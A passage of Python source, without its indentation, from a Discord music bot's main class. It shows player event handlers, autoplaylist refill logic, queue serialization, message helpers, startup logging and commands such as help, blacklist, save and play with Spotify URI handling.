.on("resume", self.on_player_resume)
.on("pause", self.on_player_pause)
.on("stop", self.on_player_stop)
.on("finished-playing", self.on_player_finished_playing)
.on("entry-added", self.on_player_entry_added)
.on("error", self.on_player_error)
)
player.skip_state = SkipState()
if guild:
self.players[guild.id] = player
return player
async def on_player_play(self, player, entry):
log.debug("Running on_player_play")
await self.update_now_playing_status(entry)
player.skip_state.reset()
# This is the one event where its ok to serialize autoplaylist entries
await self.serialize_queue(player.voice_client.channel.guild)
if self.config.write_current_song:
await self.write_current_song(player.voice_client.channel.guild, entry)
channel = entry.meta.get("channel", None)
author = entry.meta.get("author", None)
if channel and author:
author_perms = self.permissions.for_user(author)
if (
author not in player.voice_client.channel.members
and author_perms.skip_when_absent
):
newmsg = self.str.get(
"on_player_play-onChannel_authorNotInChannel_skipWhenAbsent",
"Skipping next song in {channel}: {title} added by {author} as queuer not in voice!",
).format(
channel=player.voice_client.channel.name,
title=entry.title,
author=entry.meta["author"].name,
)
player.skip()
elif self.config.now_playing_mentions:
newmsg = self.str.get(
"on_player_play-onChannel_playingMention",
"{author} - your song {title} is now playing in {channel}!",
).format(
author=entry.meta["author"].mention,
title=entry.title,
channel=player.voice_client.channel.name,
)
else:
newmsg = self.str.get(
"on_player_play-onChannel",
"Now playing in {channel}: {title} added by {author}!",
).format(
channel=player.voice_client.channel.name,
title=entry.title,
author=entry.meta["author"].name,
)
else:
# no author (and channel), it's an autoplaylist (or autostream from my other PR) entry.
newmsg = self.str.get(
"on_player_play-onChannel_noAuthor_autoplaylist",
"Now playing automatically added entry {title} in {channel}!",
).format(title=entry.title, channel=player.voice_client.channel.name)
if newmsg:
if self.config.dm_nowplaying and author:
await self.safe_send_message(author, newmsg)
return
if self.config.no_nowplaying_auto and not author:
return
guild = player.voice_client.guild
last_np_msg = self.server_specific_data[guild]["last_np_msg"]
if self.config.nowplaying_channels:
for potential_channel_id in self.config.nowplaying_channels:
potential_channel = self.get_channel(potential_channel_id)
if potential_channel and potential_channel.guild == guild:
channel = potential_channel
break
if channel:
pass
elif not channel and last_np_msg:
channel = last_np_msg.channel
else:
log.debug("no channel to put now playing message into")
return
# send it in specified channel
self.server_specific_data[guild][
"last_np_msg"
] = await self.safe_send_message(channel, newmsg)
# TODO: Check channel voice state?
async def on_player_resume(self, player, entry, **_):
log.debug("Running on_player_resume")
await self.update_now_playing_status(entry)
async def on_player_pause(self, player, entry, **_):
log.debug("Running on_player_pause")
await self.update_now_playing_status(entry, True)
# await self.serialize_queue(player.voice_client.channel.guild)
async def on_player_stop(self, player, **_):
log.debug("Running on_player_stop")
await self.update_now_playing_status()
async def on_player_finished_playing(self, player, **_):
log.debug("Running on_player_finished_playing")
# delete last_np_msg somewhere if we have cached it
if self.config.delete_nowplaying:
guild = player.voice_client.guild
last_np_msg = self.server_specific_data[guild]["last_np_msg"]
if last_np_msg:
await self.safe_delete_message(last_np_msg)
def _autopause(player):
if self._check_if_empty(player.voice_client.channel):
log.info("Player finished playing, autopaused in empty channel")
player.pause()
self.server_specific_data[player.voice_client.channel.guild][
"auto_paused"
] = True
if (
not player.playlist.entries
and not player.current_entry
and self.config.auto_playlist
):
if not player.autoplaylist:
if not self.autoplaylist:
# TODO: When I add playlist expansion, make sure that's not happening during this check
log.warning("No playable songs in the autoplaylist, disabling.")
self.config.auto_playlist = False
else:
log.debug(
"No content in current autoplaylist. Filling with new music..."
)
player.autoplaylist = list(self.autoplaylist)
while player.autoplaylist:
if self.config.auto_playlist_random:
random.shuffle(player.autoplaylist)
song_url = random.choice(player.autoplaylist)
else:
song_url = player.autoplaylist[0]
player.autoplaylist.remove(song_url)
info = {}
try:
info = await self.downloader.extract_info(
player.playlist.loop, song_url, download=False, process=False
)
except downloader.youtube_dl.utils.DownloadError as e:
if "YouTube said:" in e.args[0]:
# url is bork, remove from list and put in removed list
log.error("Error processing youtube url:\n{}".format(e.args[0]))
else:
# Probably an error from a different extractor, but I've only seen youtube's
log.error(
'Error processing "{url}": {ex}'.format(url=song_url, ex=e)
)
await self.remove_from_autoplaylist(
song_url, ex=e, delete_from_ap=self.config.remove_ap
)
continue
except Exception as e:
log.error(
'Error processing "{url}": {ex}'.format(url=song_url, ex=e)
)
log.exception()
self.autoplaylist.remove(song_url)
continue
if info.get("entries", None): # or .get('_type', '') == 'playlist'
log.debug(
"Playlist found but is unsupported at this time, skipping."
)
# TODO: Playlist expansion
# Do I check the initial conditions again?
# not (not player.playlist.entries and not player.current_entry and self.config.auto_playlist)
if self.config.auto_pause:
player.once("play", lambda player, **_: _autopause(player))
try:
await player.playlist.add_entry(
song_url, channel=None, author=None, head=False
)
except exceptions.ExtractionError as e:
log.error("Error adding song from autoplaylist: {}".format(e))
log.debug("", exc_info=True)
continue
break
if not self.autoplaylist:
# TODO: When I add playlist expansion, make sure that's not happening during this check
log.warning("No playable songs in the autoplaylist, disabling.")
self.config.auto_playlist = False
else: # Don't serialize for autoplaylist events
await self.serialize_queue(player.voice_client.channel.guild)
if not player.is_stopped and not player.is_dead:
player.play(_continue=True)
async def on_player_entry_added(self, player, playlist, entry, **_):
log.debug("Running on_player_entry_added")
if entry.meta.get("author") and entry.meta.get("channel"):
await self.serialize_queue(player.voice_client.channel.guild)
async def on_player_error(self, player, entry, ex, **_):
if "channel" in entry.meta:
await self.safe_send_message(
entry.meta["channel"], "```\nError while playing:\n{}\n```".format(ex)
)
else:
log.exception("Player error", exc_info=ex)
async def update_now_playing_status(self, entry=None, is_paused=False):
game = None
if not self.config.status_message:
if self.user.bot:
activeplayers = sum(1 for p in self.players.values() if p.is_playing)
if activeplayers > 1:
game = discord.Game(
type=0, name="music on %s guilds" % activeplayers
)
entry = None
elif activeplayers == 1:
player = discord.utils.get(self.players.values(), is_playing=True)
entry = player.current_entry
if entry:
prefix = u"\u275A\u275A " if is_paused else ""
name = u"{}{}".format(prefix, entry.title)[:128]
game = discord.Game(type=0, name=name)
else:
game = discord.Game(type=0, name=self.config.status_message.strip()[:128])
async with self.aiolocks[_func_()]:
if game != self.last_status:
await self.change_presence(activity=game)
self.last_status = game
async def update_now_playing_message(self, guild, message, *, channel=None):
lnp = self.server_specific_data[guild]["last_np_msg"]
m = None
if message is None and lnp:
await self.safe_delete_message(lnp, quiet=True)
elif lnp: # If there was a previous lp message
oldchannel = lnp.channel
if lnp.channel == oldchannel: # If we have a channel to update it in
async for lmsg in lnp.channel.history(limit=1):
if lmsg != lnp and lnp: # If we need to resend it
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(channel, message, quiet=True)
else:
m = await self.safe_edit_message(
lnp, message, send_if_fail=True, quiet=False
)
elif channel: # If we have a new channel to send it to
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(channel, message, quiet=True)
else: # we just resend it in the old channel
await self.safe_delete_message(lnp, quiet=True)
m = await self.safe_send_message(oldchannel, message, quiet=True)
elif channel: # No previous message
m = await self.safe_send_message(channel, message, quiet=True)
self.server_specific_data[guild]["last_np_msg"] = m
async def serialize_queue(self, guild, *, dir=None):
"""
Serialize the current queue for a server's player to json.
"""
player = self.get_player_in(guild)
if not player:
return
if dir is None:
dir = "data/%s/queue.json" % guild.id
async with self.aiolocks["queue_serialization" + ":" + str(guild.id)]:
log.debug("Serializing queue for %s", guild.id)
with open(dir, "w", encoding="utf8") as f:
f.write(player.serialize(sort_keys=True))
async def serialize_all_queues(self, *, dir=None):
coros = [self.serialize_queue(s, dir=dir) for s in self.guilds]
await asyncio.gather(*coros, return_exceptions=True)
async def deserialize_queue(
self, guild, voice_client, playlist=None, *, dir=None
) -> MusicPlayer:
"""
Deserialize a saved queue for a server into a MusicPlayer. If no queue is saved, returns None.
"""
if playlist is None:
playlist = Playlist(self)
if dir is None:
dir = "data/%s/queue.json" % guild.id
async with self.aiolocks["queue_serialization" + ":" + str(guild.id)]:
if not os.path.isfile(dir):
return None
log.debug("Deserializing queue for %s", guild.id)
with open(dir, "r", encoding="utf8") as f:
data = f.read()
return MusicPlayer.from_json(data, self, voice_client, playlist)
async def write_current_song(self, guild, entry, *, dir=None):
"""
Writes the current song to file
"""
player = self.get_player_in(guild)
if not player:
return
if dir is None:
dir = "data/%s/current.txt" % guild.id
async with self.aiolocks["current_song" + ":" + str(guild.id)]:
log.debug("Writing current song for %s", guild.id)
with open(dir, "w", encoding="utf8") as f:
f.write(entry.title)
@ensure_appinfo
async def _on_ready_sanity_checks(self):
# Ensure folders exist
await self._scheck_ensure_env()
# Server permissions check
await self._scheck_server_permissions()
# playlists in autoplaylist
await self._scheck_autoplaylist()
# config/permissions async validate?
await self._scheck_configs()
async def _scheck_ensure_env(self):
log.debug("Ensuring data folders exist")
for guild in self.guilds:
pathlib.Path("data/%s/" % guild.id).mkdir(exist_ok=True)
with open("data/server_names.txt", "w", encoding="utf8") as f:
for guild in sorted(self.guilds, key=lambda s: int(s.id)):
f.write("{:<22} {}\n".format(guild.id, guild.name))
if not self.config.save_videos and os.path.isdir(AUDIO_CACHE_PATH):
if self._delete_old_audiocache():
log.debug("Deleted old audio cache")
else:
log.debug("Could not delete old audio cache, moving on.")
async def _scheck_server_permissions(self):
log.debug("Checking server permissions")
pass # TODO
async def _scheck_autoplaylist(self):
log.debug("Auditing autoplaylist")
pass # TODO
async def _scheck_configs(self):
log.debug("Validating config")
await self.config.async_validate(self)
log.debug("Validating permissions config")
await self.permissions.async_validate(self)
#######################################################################################################################
async def safe_send_message(self, dest, content, **kwargs):
tts = kwargs.pop("tts", False)
quiet = kwargs.pop("quiet", False)
expire_in = kwargs.pop("expire_in", 0)
allow_none = kwargs.pop("allow_none", True)
also_delete = kwargs.pop("also_delete", None)
msg = None
lfunc = log.debug if quiet else log.warning
try:
if content is not None or allow_none:
if isinstance(content, discord.Embed):
msg = await dest.send(embed=content)
else:
msg = await dest.send(content, tts=tts)
except discord.Forbidden:
lfunc('Cannot send message to "%s", no permission', dest.name)
except discord.NotFound:
lfunc('Cannot send message to "%s", invalid channel?', dest.name)
except discord.HTTPException:
if len(content) > DISCORD_MSG_CHAR_LIMIT:
lfunc(
"Message is over the message size limit (%s)",
DISCORD_MSG_CHAR_LIMIT,
)
else:
lfunc("Failed to send message")
log.noise(
"Got HTTPException trying to send message to %s: %s", dest, content
)
finally:
if msg and expire_in:
asyncio.ensure_future(self._wait_delete_msg(msg, expire_in))
if also_delete and isinstance(also_delete, discord.Message):
asyncio.ensure_future(self._wait_delete_msg(also_delete, expire_in))
return msg
async def safe_delete_message(self, message, *, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await message.delete()
except discord.Forbidden:
lfunc(
'Cannot delete message "{}", no permission'.format(
message.clean_content
)
)
except discord.NotFound:
lfunc(
'Cannot delete message "{}", message not found'.format(
message.clean_content
)
)
async def safe_edit_message(self, message, new, *, send_if_fail=False, quiet=False):
lfunc = log.debug if quiet else log.warning
try:
return await message.edit(content=new)
except discord.NotFound:
lfunc(
'Cannot edit message "{}", message not found'.format(
message.clean_content
)
)
if send_if_fail:
lfunc("Sending message instead")
return await self.safe_send_message(message.channel, new)
async def send_typing(self, destination):
try:
return await destination.trigger_typing()
except discord.Forbidden:
log.warning(
"Could not send typing to {}, no permission".format(destination)
)
async def restart(self):
self.exit_signal = exceptions.RestartSignal()
await self.close()
def restart_threadsafe(self):
asyncio.run_coroutine_threadsafe(self.restart(), self.loop)
def _cleanup(self):
try:
self.loop.run_until_complete(self.logout())
self.loop.run_until_complete(self.aiosession.close())
except:
pass
pending = asyncio.all_tasks()
gathered = asyncio.gather(*pending)
try:
gathered.cancel()
self.loop.run_until_complete(gathered)
gathered.exception()
except:
pass
# noinspection PyMethodOverriding
def run(self):
try:
self.loop.run_until_complete(self.start(*self.config.auth))
except discord.errors.LoginFailure:
# Add if token, else
raise exceptions.HelpfulError(
"Bot cannot login, bad credentials.",
"Fix your token in the options file. "
"Remember that each field should be on their own line.",
) # ^^^^ In theory self.config.auth should never have no items
finally:
try:
self._cleanup()
except Exception:
log.error("Error in cleanup", exc_info=True)
if self.exit_signal:
raise self.exit_signal # pylint: disable=E0702
async def logout(self):
await self.disconnect_all_voice_clients()
return await super().close()
async def on_error(self, event, *args, **kwargs):
ex_type, ex, stack = sys.exc_info()
if ex_type == exceptions.HelpfulError:
log.error("Exception in {}:\n{}".format(event, ex.message))
await asyncio.sleep(2) # don't ask
await self.logout()
elif issubclass(ex_type, exceptions.Signal):
self.exit_signal = ex_type
await self.logout()
else:
log.error("Exception in {}".format(event), exc_info=True)
async def on_resumed(self):
log.info("\nReconnected to discord.\n")
async def on_ready(self):
dlogger = logging.getLogger("discord")
for h in dlogger.handlers:
if getattr(h, "terminator", None) == "":
dlogger.removeHandler(h)
print()
log.debug("Connection established, ready to go.")
self.ws._keep_alive.name = "Gateway Keepalive"
if self.init_ok:
log.debug("Received additional READY event, may have failed to resume")
return
await self._on_ready_sanity_checks()
self.init_ok = True
################################
log.info(
"Connected: {0}/{1}#{2}".format(
self.user.id, self.user.name, self.user.discriminator
)
)
owner = self._get_owner(voice=True) or self._get_owner()
if owner and self.guilds:
log.info(
"Owner: {0}/{1}#{2}\n".format(
owner.id, owner.name, owner.discriminator
)
)
log.info("Guild List:")
unavailable_servers = 0
for s in self.guilds:
ser = "{} (unavailable)".format(s.name) if s.unavailable else s.name
log.info(" - " + ser)
if self.config.leavenonowners:
if s.unavailable:
unavailable_servers += 1
else:
check = s.get_member(owner.id)
if check == None:
await s.leave()
log.info(
"Left {} due to bot owner not found".format(s.name)
)
if unavailable_servers != 0:
log.info(
"Not proceeding with checks in {} servers due to unavailability".format(
str(unavailable_servers)
)
)
elif self.guilds:
log.warning(
"Owner could not be found on any guild (id: %s)\n"
% self.config.owner_id
)
log.info("Guild List:")
for s in self.guilds:
ser = "{} (unavailable)".format(s.name) if s.unavailable else s.name
log.info(" - " + ser)
else:
log.warning("Owner unknown, bot is not on any guilds.")
if self.user.bot:
log.warning(
"To make the bot join a guild, paste this link in your browser. \n"
"Note: You should be logged into your main account and have \n"
"manage server permissions on the guild you want the bot to join.\n"
" " + await self.generate_invite_link()
)
print(flush=True)
if self.config.bound_channels:
chlist = set(self.get_channel(i) for i in self.config.bound_channels if i)
chlist.discard(None)
invalids = set()
invalids.update(c for c in chlist if isinstance(c, discord.VoiceChannel))
chlist.difference_update(invalids)
self.config.bound_channels.difference_update(invalids)
if chlist:
log.info("Bound to text channels:")
[
log.info(" - {}/{}".format(ch.guild.name.strip(), ch.name.strip()))
for ch in chlist
if ch
]
else:
print("Not bound to any text channels")
if invalids and self.config.debug_mode:
print(flush=True)
log.info("Not binding to voice channels:")
[
log.info(" - {}/{}".format(ch.guild.name.strip(), ch.name.strip()))
for ch in invalids
if ch
]
print(flush=True)
else:
log.info("Not bound to any text channels")
if self.config.autojoin_channels:
chlist = set(
self.get_channel(i) for i in self.config.autojoin_channels if i
)
chlist.discard(None)
invalids = set()
invalids.update(c for c in chlist if isinstance(c, discord.TextChannel))
chlist.difference_update(invalids)
self.config.autojoin_channels.difference_update(invalids)
if chlist:
log.info("Autojoining voice channels:")
[
log.info(" - {}/{}".format(ch.guild.name.strip(), ch.name.strip()))
for ch in chlist
if ch
]
else:
log.info("Not autojoining any voice channels")
if invalids and self.config.debug_mode:
print(flush=True)
log.info("Cannot autojoin text channels:")
[
log.info(" - {}/{}".format(ch.guild.name.strip(), ch.name.strip()))
for ch in invalids
if ch
]
self.autojoin_channels = chlist
else:
log.info("Not autojoining any voice channels")
self.autojoin_channels = set()
if self.config.show_config_at_start:
print(flush=True)
log.info("Options:")
log.info(" Command prefix: " + self.config.command_prefix)
log.info(
" Default volume: {}%".format(int(self.config.default_volume * 100))
)
log.info(
" Skip threshold: {} votes or {}%".format(
self.config.skips_required,
fixg(self.config.skip_ratio_required * 100),
)
)
log.info(
" Now Playing @mentions: "
+ ["Disabled", "Enabled"][self.config.now_playing_mentions]
)
log.info(
" Auto-Summon: " + ["Disabled", "Enabled"][self.config.auto_summon]
)
log.info(
" Auto-Playlist: "
+ ["Disabled", "Enabled"][self.config.auto_playlist]
+ " (order: "
+ ["sequential", "random"][self.config.auto_playlist_random]
+ ")"
)
log.info(" Auto-Pause: " + ["Disabled", "Enabled"][self.config.auto_pause])
log.info(
" Delete Messages: "
+ ["Disabled", "Enabled"][self.config.delete_messages]
)
if self.config.delete_messages:
log.info(
" Delete Invoking: "
+ ["Disabled", "Enabled"][self.config.delete_invoking]
)
log.info(" Debug Mode: " + ["Disabled", "Enabled"][self.config.debug_mode])
log.info(
" Downloaded songs will be "
+ ["deleted", "saved"][self.config.save_videos]
)
if self.config.status_message:
log.info(" Status message: " + self.config.status_message)
log.info(
" Write current songs to file: "
+ ["Disabled", "Enabled"][self.config.write_current_song]
)
log.info(
" Author insta-skip: "
+ ["Disabled", "Enabled"][self.config.allow_author_skip]
)
log.info(" Embeds: " + ["Disabled", "Enabled"][self.config.embeds])
log.info(
" Spotify integration: "
+ ["Disabled", "Enabled"][self.config._spotify]
)
log.info(
" Legacy skip: " + ["Disabled", "Enabled"][self.config.legacy_skip]
)
log.info(
" Leave non owners: "
+ ["Disabled", "Enabled"][self.config.leavenonowners]
)
print(flush=True)
await self.update_now_playing_status()
# maybe option to leave the ownerid blank and generate a random command for the owner to use
# wait_for_message is pretty neato
await self._join_startup_channels(
self.autojoin_channels, autosummon=self.config.auto_summon
)
# we do this after the config stuff because it's a lot easier to notice here
if self.config.missing_keys:
log.warning(
"Your config file is missing some options. If you have recently updated, "
"check the example_options.ini file to see if there are new options available to you. "
"The options missing are: {0}".format(self.config.missing_keys)
)
print(flush=True)
# t-t-th-th-that's all folks!
def _gen_embed(self):
"""Provides a basic template for embeds"""
e = discord.Embed()
e.colour = 7506394
e.set_footer(
text=self.config.footer_text, icon_url="https://i.imgur.com/gFHBoZA.png"
)
e.set_author(
name=self.user.name,
url="https://github.com/Just-Some-Bots/MusicBot",
icon_url=self.user.avatar_url,
)
return e
async def cmd_resetplaylist(self, player, channel):
"""
Usage:
{command_prefix}resetplaylist
Resets all songs in the server's autoplaylist
"""
player.autoplaylist = list(set(self.autoplaylist))
return Response(
self.str.get("cmd-resetplaylist-response", "\N{OK HAND SIGN}"),
delete_after=15,
)
async def cmd_help(self, message, channel, command=None):
"""
Usage:
{command_prefix}help [command]
Prints a help message.
If a command is specified, it prints a help message for that command.
Otherwise, it lists the available commands.
"""
self.commands = []
self.is_all = False
prefix = self.config.command_prefix
if command:
if command.lower() == "all":
self.is_all = True
await self.gen_cmd_list(message, list_all_cmds=True)
else:
cmd = getattr(self, "cmd_" + command, None)
if cmd and not hasattr(cmd, "dev_cmd"):
return Response(
"```\n{}```".format(dedent(cmd.__doc__)).format(
command_prefix=self.config.command_prefix
),
delete_after=60,
)
else:
raise exceptions.CommandError(
self.str.get("cmd-help-invalid", "No such command"),
expire_in=10,
)
elif message.author.id == self.config.owner_id:
await self.gen_cmd_list(message, list_all_cmds=True)
else:
await self.gen_cmd_list(message)
desc = (
"```\n"
+ ", ".join(self.commands)
+ "\n```\n"
+ self.str.get(
"cmd-help-response",
"For information about a particular command, run `{}help [command]`\n"
"For further help, see https://just-some-bots.github.io/MusicBot/",
).format(prefix)
)
if not self.is_all:
desc += self.str.get(
"cmd-help-all",
"\nOnly showing commands you can use, for a list of all commands, run `{}help all`",
).format(prefix)
return Response(desc, reply=True, delete_after=60)
async def cmd_blacklist(self, message, user_mentions, option, something):
"""
Usage:
{command_prefix}blacklist [ + | - | add | remove ] @UserName [@UserName2 ...]
Add or remove users to the blacklist.
Blacklisted users are forbidden from using bot commands.
"""
if not user_mentions:
raise exceptions.CommandError("No users listed.", expire_in=20)
if option not in ["+", "-", "add", "remove"]:
raise exceptions.CommandError(
self.str.get(
"cmd-blacklist-invalid",
'Invalid option "{0}" specified, use +, -, add, or remove',
).format(option),
expire_in=20,
)
for user in user_mentions.copy():
if user.id == self.config.owner_id:
print("[Commands:Blacklist] The owner cannot be blacklisted.")
user_mentions.remove(user)
old_len = len(self.blacklist)
if option in ["+", "add"]:
self.blacklist.update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
self.str.get(
"cmd-blacklist-added", "{0} users have been added to the blacklist"
).format(len(self.blacklist) - old_len),
reply=True,
delete_after=10,
)
else:
if self.blacklist.isdisjoint(user.id for user in user_mentions):
return Response(
self.str.get(
"cmd-blacklist-none",
"None of those users are in the blacklist.",
),
reply=True,
delete_after=10,
)
else:
self.blacklist.difference_update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
self.str.get(
"cmd-blacklist-removed",
"{0} users have been removed from the blacklist",
).format(old_len - len(self.blacklist)),
reply=True,
delete_after=10,
)
async def cmd_id(self, author, user_mentions):
"""
Usage:
{command_prefix}id [@user]
Tells the user their id or the id of another user.
"""
if not user_mentions:
return Response(
self.str.get("cmd-id-self", "Your ID is `{0}`").format(author.id),
reply=True,
delete_after=35,
)
else:
usr = user_mentions[0]
return Response(
self.str.get("cmd-id-other", "**{0}**s ID is `{1}`").format(
usr.name, usr.id
),
reply=True,
delete_after=35,
)
async def cmd_save(self, player, url=None):
"""
Usage:
{command_prefix}save [url]
Saves the specified song or current song if not specified to the autoplaylist.
"""
if url or (
player.current_entry
and not isinstance(player.current_entry, StreamPlaylistEntry)
):
if not url:
url = player.current_entry.url
if url not in self.autoplaylist:
self.autoplaylist.append(url)
write_file(self.config.auto_playlist_file, self.autoplaylist)
log.debug("Appended {} to autoplaylist".format(url))
return Response(
self.str.get(
"cmd-save-success", "Added <{0}> to the autoplaylist."
).format(url)
)
else:
raise exceptions.CommandError(
self.str.get(
"cmd-save-exists", "This song is already in the autoplaylist."
)
)
else:
raise exceptions.CommandError(
self.str.get("cmd-save-invalid", "There is no valid song playing.")
)
@owner_only
async def cmd_joinserver(self, message, server_link=None):
"""
Usage:
{command_prefix}joinserver invite_link
Asks the bot to join a server. Note: Bot accounts cannot use invite links.
"""
url = await self.generate_invite_link()
return Response(
self.str.get(
"cmd-joinserver-response", "Click here to add me to a server: \n{}"
).format(url),
reply=True,
delete_after=30,
)
async def cmd_karaoke(self, player, channel, author):
"""
Usage:
{command_prefix}karaoke
Activates karaoke mode. During karaoke mode, only groups with the BypassKaraokeMode
permission in the config file can queue music.
"""
player.karaoke_mode = not player.karaoke_mode
return Response(
"\N{OK HAND SIGN} Karaoke mode is now "
+ ["disabled", "enabled"][player.karaoke_mode],
delete_after=15,
)
async def _do_playlist_checks(self, permissions, player, author, testobj):
num_songs = sum(1 for _ in testobj)
# I have to do exe extra checks anyways because you can request an arbitrary number of search results
if not permissions.allow_playlists and num_songs > 1:
raise exceptions.PermissionsError(
self.str.get(
"playlists-noperms", "You are not allowed to request playlists"
),
expire_in=30,
)
if (
permissions.max_playlist_length
and num_songs > permissions.max_playlist_length
):
raise exceptions.PermissionsError(
self.str.get(
"playlists-big", "Playlist has too many entries ({0} > {1})"
).format(num_songs, permissions.max_playlist_length),
expire_in=30,
)
# This is a little bit weird when it says (x + 0 > y), I might add the other check back in
if (
permissions.max_songs
and player.playlist.count_for_user(author) + num_songs
> permissions.max_songs
):
raise exceptions.PermissionsError(
self.str.get(
"playlists-limit",
"Playlist entries + your already queued songs reached limit ({0} + {1} > {2})",
).format(
num_songs,
player.playlist.count_for_user(author),
permissions.max_songs,
),
expire_in=30,
)
return True
async def cmd_play(
self, message, _player, channel, author, permissions, leftover_args, song_url
):
"""
Usage:
{command_prefix}play song_link
{command_prefix}play text to search for
{command_prefix}play spotify_uri
Adds the song to the playlist. If a link is not provided, the first
result from a youtube search is added to the queue.
If enabled in the config, the bot will also support Spotify URIs, however
it will use the metadata (e.g song name and artist) to find a YouTube
equivalent of the song. Streaming from Spotify is not possible.
"""
return await self._cmd_play(
message,
_player,
channel,
author,
permissions,
leftover_args,
song_url,
head=False,
)
async def cmd_playnext(
self, message, _player, channel, author, permissions, leftover_args, song_url
):
"""
Usage:
{command_prefix}playnext song_link
{command_prefix}playnext text to search for
{command_prefix}playnext spotify_uri
Adds the song to the playlist next. If a link is not provided, the first
result from a youtube search is added to the queue.
If enabled in the config, the bot will also support Spotify URIs, however
it will use the metadata (e.g song name and artist) to find a YouTube
equivalent of the song. Streaming from Spotify is not possible.
"""
return await self._cmd_play(
message,
_player,
channel,
author,
permissions,
leftover_args,
song_url,
head=True,
)
async def _cmd_play(
self,
message,
_player,
channel,
author,
permissions,
leftover_args,
song_url,
head,
):
if _player:
player = _player
elif permissions.summonplay:
vc = author.voice.channel if author.voice else None
response = await self.cmd_summon(
channel, channel.guild, author, vc
) # @TheerapakG: As far as I know voice_channel param is unused
if self.config.embeds:
content = self._gen_embed()
content.title = "summon"
content.description = response.content
else:
content = response.content
await self.safe_send_message(
channel,
content,
expire_in=response.delete_after if self.config.delete_messages else 0,
)
player = self.get_player_in(channel.guild)
if not player:
raise exceptions.CommandError(
"The bot is not in a voice channel. "
"Use %ssummon to summon it to your voice channel."
% self.config.command_prefix
)
song_url = song_url.strip("<>")
await self.send_typing(channel)
if leftover_args:
song_url = " ".join([song_url, *leftover_args])
leftover_args = None # prevent some crazy shit happening down the line
# Make sure forward slashes work properly in search queries
linksRegex = "((http(s)*:[/][/]|www.)([a-z]|[A-Z]|[0-9]|[/.]|[~])*)"
pattern = re.compile(linksRegex)
matchUrl = pattern.match(song_url)
song_url = song_url.replace("/", "%2F") if matchUrl is None else song_url
# Rewrite YouTube playlist URLs if the wrong URL type is given
playlistRegex = r"watch\?v=.+&(list=[^&]+)"
matches = re.search(playlistRegex, song_url)
groups = matches.groups() if matches is not None else []
song_url = (
"https://www.youtube.com/playlist?" + groups[0]
if len(groups) > 0
else song_url
)
if self.config._spotify:
if "open.spotify.com" in song_url:
song_url = "spotify:" + re.sub(
"(http[s]?:\/\/)?(open.spotify.com)\/", "", song_url
).replace("/", ":")
# remove session id (and other query stuff)
song_url = re.sub("\?.*", "", song_url)
if song_url.startswith("spotify:"):
parts = song_url.split(":")
try:
if "track" in parts:
res = await self.spotify.get_track(parts[-1])
song_url = res["artists"][0]["name"] + " " + res["name"]
elif "album" in parts:
res = await self.spotify.get_album(parts[-1])
await self._do_playlist_checks(
permissions, player, author, res["tracks"]["items"]
)
procmesg = await self.safe_send_message(
channel,
self.str.get(
"cmd-play-spotify-album-process",
"Processing album `{0}` (`{1}`)",
).format(res["name"], song_url),
)
for i in res["tracks"]["items"]:
song_url = i["name"] + " " + i["artists"][0]["name"]
log.debug("Processing {0}".format(song_url))
await self.cmd_play(
message,
player,
channel,
author,
permissions,
leftover_args,
song_url,
)
await self.safe_delete_message(procmesg)
return Response(
self.str.get(
"cmd-play-spotify-album-queued",
"Enqueued `{0}` with **{1}** songs.",
).format(res["name"], len(res["tracks"]["items"]))
)
elif "playlist" in parts:
res = []
r = await self.spotify.get_playlist_tracks(parts[-1])
while True:
res.extend(r["items"])
if r["next"] is not None:
r = await self.spotify.make_spotify_req(r["next"])
continue
else:
break
await self._do_playlist_checks(permissions, player, author, res)
procmesg = await self.safe_send_message(
channel,
self.str.get(
"cmd-play-spotify-playlist-process",
"Processing playlist `{0}` (`{1}`)",
).format(parts[-1], song_url),
)
for i in res:
song_url = (
i["track"]["name"]
+ " "
+ i["track"]["artists"][0]["name"]
)
log.debug("Processing {0}".format(song_url))
await self.cmd_play(
message,
player,
channel,
author,
permissions,
leftover_args,
song_url,
)
await self.safe_delete_message(procmesg)
return Response(
self.str.get(
"cmd-play-spotify-playlist-queued",
"Enqueued `{0}` with **{1}** songs.",
).format(parts[-1], len(res))
)
else:
raise exceptions.CommandError(
self.str.get(
"cmd-play-spotify-unsupported",
"That is not a supported Spotify URI.",
),
expire_in=30,
)
except exceptions.SpotifyError:
raise exceptions.CommandError(
self.str.get(
"cmd-play-spotify-invalid",
"You either provided an invalid URI, or there was a problem.",
)
)
async def get_info(song_url):
info = await self.downloader.extract_info(
player.playlist.loop, song_url, download=False, process=False
)
# If there is an exception arise when processing we go on and let extract_info down the line report it
# because info might be a playlist and thing that's broke it might be individual entry
try:
info_process = await self.downloader.extract_info(
player.playlist.loop, song_url, download=False
)
info_process_err = None
except Exception as e:
info_process = None
info_process_err = e
return (info, info_process, info_process_err)
# This lock prevent spamming play command to add entries that exceeds time limit/ maximum song limit
async with self.aiolocks[_func_() + ":" + str(author.id)]:
if (
permissions.max_songs
and player.playlist.count_for_user(author) >= permissions.max_songs
):
raise exceptions.PermissionsError(
self.str.get(
"cmd-play-limit",
"You have reached your enqueued song limit ({0})",
).format(permissions.max_songs),
expire_in=30,
)
if player.karaoke_mode and not permissions.bypass_karaoke_mode:
raise exceptions.PermissionsError(
self.str.get(
"karaoke-enabled",
"Karaoke mode is enabled, please try again when its disabled!",
),
expire_in=30,
)
# Try to determine entry type, if _type is playlist then there should be entries
while True:
try:
info, info_process, info_process_err = await get_info(song_url)
log.debug(info)
if (
info_process
and info
and info_process.get("_type", None) == "playlist"
and "entries" not in info
and not info.get("url", "").startswith("ytsearch")
):
use_url = info_process.get(
"webpage_url", None
) or info_process.get("url", None)
if use_url == song_url:
log.warning(
"Determined incorrect entry type, but suggested url is the same. Help."
)
break # If we break here it will break things down the line and give "This is a playlist" exception as a result
log.debug(
'Assumed url "%s" was a single entry, was actually a playlist'
% song_url
)
log.debug('Using "%s" instead' % use_url)
song_url = use_url
else:
break
except Exception as e:
if "unknown url type" in str(e):
song_url = song_url.replace(
":", ""
) # it's probably not actually an extractor
info, info_process, info_process_err = await get_info(song_url)
else:
raise exceptions.CommandError(e, expire_in=30)
if not info:
raise exceptions.CommandError(
self.str.get(
"cmd-play-noinfo",
"That video cannot be played. Try using the {0}stream command.",
).format(self.config.command_prefix),
expire_in=30,
)
if (
info.get("extractor", "") not in permissions.extractors
